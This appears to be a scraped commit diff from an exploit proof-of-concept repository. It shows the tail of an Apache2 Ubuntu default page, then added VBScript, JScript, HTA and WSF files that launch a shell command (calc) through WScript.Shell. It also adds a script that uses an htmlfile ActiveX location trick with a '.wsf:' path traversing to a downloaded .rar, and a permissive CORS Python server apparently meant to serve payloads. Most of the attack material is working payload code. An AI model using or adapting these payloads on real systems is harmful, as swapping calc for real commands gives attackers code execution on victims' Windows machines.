div.content_section_text a:hover { |
||||
background-color: #000000; |
||||
|
||||
color: #DCDFE6; |
||||
} |
||||
|
||||
div.validator { |
||||
} |
||||
</style> |
||||
</head> |
||||
<body> |
||||
<div class="main_page"> |
||||
<div class="page_header floating_element"> |
||||
<img src="/icons/ubuntu-logo.png" alt="Ubuntu Logo" class="floating_element"/> |
||||
<span class="floating_element"> |
||||
Apache2 Ubuntu Default Page |
||||
</span> |
||||
</div> |
||||
<!-- <div class="table_of_contents floating_element"> |
||||
<div class="section_header section_header_grey"> |
||||
TABLE OF CONTENTS |
||||
</div> |
||||
<div class="table_of_contents_item floating_element"> |
||||
<a href="#about">About</a> |
||||
</div> |
||||
<div class="table_of_contents_item floating_element"> |
||||
<a href="#changes">Changes</a> |
||||
</div> |
||||
<div class="table_of_contents_item floating_element"> |
||||
<a href="#scope">Scope</a> |
||||
</div> |
||||
<div class="table_of_contents_item floating_element"> |
||||
<a href="#files">Config files</a> |
||||
</div> |
||||
</div> |
||||
--> |
||||
<div class="content_section floating_element"> |
||||
|
||||
|
||||
<div class="section_header section_header_red"> |
||||
<div id="about"></div> |
||||
It works! |
||||
</div> |
||||
<div class="content_section_text"> |
||||
<p> |
||||
This is the default welcome page used to test the correct |
||||
operation of the Apache2 server after installation on Ubuntu systems. |
||||
It is based on the equivalent page on Debian, from which the Ubuntu Apache |
||||
packaging is derived. |
||||
If you can read this page, it means that the Apache HTTP server installed at |
||||
this site is working properly. You should <b>replace this file</b> (located at |
||||
<tt>/var/www/html/index.html</tt>) before continuing to operate your HTTP server. |
||||
</p> |
||||
|
||||
|
||||
<p> |
||||
If you are a normal user of this web site and don't know what this page is |
||||
about, this probably means that the site is currently unavailable due to |
||||
maintenance. |
||||
If the problem persists, please contact the site's administrator. |
||||
</p> |
||||
|
||||
</div> |
||||
<div class="section_header"> |
||||
<div id="changes"></div> |
||||
Configuration Overview |
||||
</div> |
||||
<div class="content_section_text"> |
||||
<p> |
||||
Ubuntu's Apache2 default configuration is different from the |
||||
upstream default configuration, and split into several files optimized for |
||||
interaction with Ubuntu tools. The configuration system is |
||||
<b>fully documented in |
||||
/usr/share/doc/apache2/README.Debian.gz</b>. Refer to this for the full |
||||
documentation. Documentation for the web server itself can be |
||||
found by accessing the <a href="/manual">manual</a> if the <tt>apache2-doc</tt> |
||||
package was installed on this server. |
||||
|
||||
</p> |
||||
<p> |
||||
The configuration layout for an Apache2 web server installation on Ubuntu systems is as follows: |
||||
</p> |
||||
<pre> |
||||
/etc/apache2/ |
||||
|-- apache2.conf |
||||
| `-- ports.conf |
||||
|-- mods-enabled |
||||
| |-- *.load |
||||
| `-- *.conf |
||||
|-- conf-enabled |
||||
| `-- *.conf |
||||
|-- sites-enabled |
||||
| `-- *.conf |
||||
</pre> |
||||
<ul> |
||||
<li> |
||||
<tt>apache2.conf</tt> is the main configuration |
||||
file. It puts the pieces together by including all remaining configuration |
||||
files when starting up the web server. |
||||
</li> |
||||
|
||||
<li> |
||||
<tt>ports.conf</tt> is always included from the |
||||
main configuration file. It is used to determine the listening ports for |
||||
incoming connections, and this file can be customized anytime. |
||||
</li> |
||||
|
||||
<li> |
||||
Configuration files in the <tt>mods-enabled/</tt>, |
||||
<tt>conf-enabled/</tt> and <tt>sites-enabled/</tt> directories contain |
||||
particular configuration snippets which manage modules, global configuration |
||||
fragments, or virtual host configurations, respectively. |
||||
</li> |
||||
|
||||
<li> |
||||
They are activated by symlinking available |
||||
configuration files from their respective |
||||
*-available/ counterparts. These should be managed |
||||
by using our helpers |
||||
<tt> |
||||
a2enmod, |
||||
a2dismod, |
||||
</tt> |
||||
<tt> |
||||
a2ensite, |
||||
a2dissite, |
||||
</tt> |
||||
and |
||||
<tt> |
||||
a2enconf, |
||||
a2disconf |
||||
</tt>. See their respective man pages for detailed information. |
||||
</li> |
||||
|
||||
<li> |
||||
The binary is called apache2. Due to the use of |
||||
environment variables, in the default configuration, apache2 needs to be |
||||
started/stopped with <tt>/etc/init.d/apache2</tt> or <tt>apache2ctl</tt>. |
||||
<b>Calling <tt>/usr/bin/apache2</tt> directly will not work</b> with the |
||||
default configuration. |
||||
</li> |
||||
</ul> |
||||
</div> |
||||
|
||||
<div class="section_header"> |
||||
<div id="docroot"></div> |
||||
Document Roots |
||||
</div> |
||||
|
||||
<div class="content_section_text"> |
||||
<p> |
||||
By default, Ubuntu does not allow access through the web browser to |
||||
<em>any</em> file apart of those located in <tt>/var/www</tt>, |
||||
<a href="http://httpd.apache.org/docs/2.4/mod/mod_userdir.html" rel="nofollow">public_html</a> |
||||
directories (when enabled) and <tt>/usr/share</tt> (for web |
||||
applications). If your site is using a web document root |
||||
located elsewhere (such as in <tt>/srv</tt>) you may need to whitelist your |
||||
document root directory in <tt>/etc/apache2/apache2.conf</tt>. |
||||
</p> |
||||
<p> |
||||
The default Ubuntu document root is <tt>/var/www/html</tt>. You |
||||
can make your own virtual hosts under /var/www. This is different |
||||
to previous releases which provides better security out of the box. |
||||
</p> |
||||
</div> |
||||
|
||||
<div class="section_header"> |
||||
<div id="bugs"></div> |
||||
Reporting Problems |
||||
</div> |
||||
<div class="content_section_text"> |
||||
<p> |
||||
Please use the <tt>ubuntu-bug</tt> tool to report bugs in the |
||||
Apache2 package with Ubuntu. However, check <a |
||||
href="https://bugs.launchpad.net/ubuntu/+source/apache2" |
||||
rel="nofollow">existing bug reports</a> before reporting a new bug. |
||||
</p> |
||||
<p> |
||||
Please report bugs specific to modules (such as PHP and others) |
||||
to respective packages, not to the web server itself. |
||||
</p> |
||||
</div> |
||||
|
||||
|
||||
|
||||
|
||||
</div> |
||||
</div> |
||||
<div class="validator"> |
||||
</div> |
||||
</body> |
||||
</html> |
||||
|
||||
|
Binary file not shown.
@ -0,0 +1,11 @@ |
||||
<script language="VBScript"> |
||||
Function Calc() |
||||
Dim wsh |
||||
Set wsh = CreateObject("Wscript.Shell") |
||||
wsh.run "cmd /c calc.exe" |
||||
Set wsh = Nothing |
||||
End Function |
||||
|
||||
Calc |
||||
self.close |
||||
</script> |
@ -0,0 +1,6 @@ |
||||
function calc(){ |
||||
var x = new ActiveXObject("WScript.shell"); |
||||
x.Run("cmd /c calc"); |
||||
} |
||||
|
||||
calc(); |
@ -0,0 +1,8 @@ |
||||
Function Calc() |
||||
Dim wsh |
||||
Set wsh = CreateObject("Wscript.Shell") |
||||
wsh.run "cmd /c calc.exe" |
||||
Set wsh = Nothing |
||||
End Function |
||||
|
||||
Calc |
@ -0,0 +1 @@ |
||||
<job><script language="JScript">var x = new ActiveXObject("WScript.shell");x.Run("cmd /c calc");</script></job> |
@ -0,0 +1 @@ |
||||
<job id="VBScriptJob"><script language="VBScript">CreateObject("WScript.Shell").Run "cmd /c calc"</script></job> |
@ -0,0 +1,2 @@ |
||||
var o = new ActiveXObject('htmlfile').Script.location='.wsf:../../../../../Users/d3adc0de.PCOIPTEST/Downloads/YK2TLVILEHG2.rar?.wsf'; |
||||
WScript.Echo(o); |
@ -0,0 +1,51 @@ |
||||
import argparse |
||||
import sys |
||||
from builtins import Exception |
||||
from http.server import HTTPServer, SimpleHTTPRequestHandler |
||||
|
||||
from werkzeug.serving import ForkingMixIn |
||||
|
||||
|
||||
class CORSRequestHandler(SimpleHTTPRequestHandler): |
||||
def end_headers(self): |
||||
self.send_header('Access-Control-Allow-Origin', '*') |
||||
self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS') |
||||
self.send_header('Cache-Control', 'no-store, no-cache, must-revalidate') |
||||
return super(CORSRequestHandler, self).end_headers() |
||||
|
||||
def do_OPTIONS(self): |
||||
self.do_GET() |
||||
|
||||
|
||||
class ForkingHTTPServer(ForkingMixIn, HTTPServer): |
||||
def finish_request(self, request, client_address): |
||||
try: |
||||
request.settimeout(15) |
||||
# "super" can not be used because BaseServer is not created from object |
||||
HTTPServer.finish_request(self, request, client_address) |
||||
except Exception as e: |
||||
print(f"[-] {e}") |
||||
|
||||
|
||||
class WebServer: |
||||
def __init__(self, ip, port): |
||||
self.ip = ip |
||||
self.port = port |
||||
|
||||
def start(self): |
||||
httpd = ForkingHTTPServer((f'{self.ip}', self.port), CORSRequestHandler) |
||||
try: |
||||
httpd.serve_forever() |
||||
except KeyboardInterrupt: |
||||
httpd.server_close() |
||||
exit(1) |
||||
|
||||
|
||||
if __name__ == '__main__': |
||||
parser = argparse.ArgumentParser(description="Simple CORS Webserver") |
||||
parser.add_argument("ip", help="Listen address", type=str) |
||||
parser.add_argument("port", help="Listen port", type=int) |
||||
args = parser.parse_args() |
||||
|
||||
server = WebServer(ip=args.ip, port=args.port) |
||||
server.start() |
Loading…
Reference in new issue